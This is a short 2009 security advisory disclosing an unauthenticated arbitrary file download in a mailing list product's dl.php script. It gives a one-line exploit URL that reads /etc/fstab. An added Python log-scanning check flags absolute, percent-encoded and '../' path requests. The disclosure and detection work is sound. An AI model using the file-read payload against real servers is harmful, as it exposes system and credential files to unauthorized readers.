big-lick-mailing-list.txt - advisories - Security advisories that I have released to the public.
big-lick-mailing-list.txt (482B)
---
Name        Big Lick Media: Mailing List
Severity    High
Vendor      www.biglickmedia.com
Authors     Jay Scott
Date        10th Jan 2009
Status      Vendor has NOT been informed


DESCRIPTION

Poor coding allows anyone to download a file on the host without
requiring authentication.


EXPLOIT

Simply go to the following address in a web browser. Change the file
variable to the file you wish to download.

<path to application>/dl.php?file=/etc/fstab
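
DETECTION (added example)

The following is an added example, not part of the original advisory or
the vendor's code: a check a defender could run over web server access
logs to find requests to dl.php whose file parameter is a path rather
than a bare file name. It goes beyond the absolute path shown above to
also cover percent-encoded and parent-directory forms. The log lines, the
"/app" path and the combined log format are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format; "/app" is a placeholder path.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Jan/2009:10:00:01 +0000] "GET /app/dl.php?file=newsletter.pdf HTTP/1.1" 200 5120 "-" "-"
192.0.2.44 - - [10/Jan/2009:10:02:17 +0000] "GET /app/dl.php?file=/etc/fstab HTTP/1.1" 200 482 "-" "-"
192.0.2.44 - - [10/Jan/2009:10:02:40 +0000] "GET /app/dl.php?file=%2Fetc%2Ffstab HTTP/1.1" 200 482 "-" "-"
192.0.2.44 - - [10/Jan/2009:10:03:02 +0000] "GET /app/dl.php?file=..%2F..%2Fetc%2Ffstab HTTP/1.1" 404 0 "-" "-"
192.0.2.10 - - [10/Jan/2009:10:05:00 +0000] "GET /app/index.php?file=/etc/fstab HTTP/1.1" 200 300 "-" "-"
"""

REQUEST = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide a path."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return why a file= value is suspicious, or None for a bare file name."""
    path = fully_decode(value).replace("\\", "/")
    if "\x00" in path:
        return "null byte"
    if path.startswith("/"):
        return "absolute path"
    if ".." in path.split("/"):
        return "parent-directory segment"
    return None

def suspicious_downloads(log_text, script="dl.php"):
    """Return (client, decoded file value, reason, HTTP status) per flagged request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path.rsplit("/", 1)[-1] != script:
            continue  # only the download script named in the advisory
        for value in parse_qs(url.query, keep_blank_values=True).get("file", []):
            reason = classify(value)
            if reason:
                findings.append((m["ip"], fully_decode(value), reason, int(m["status"])))
    return findings
```

The status code is kept in each finding so that responders can separate
requests the server answered with a file from those it rejected.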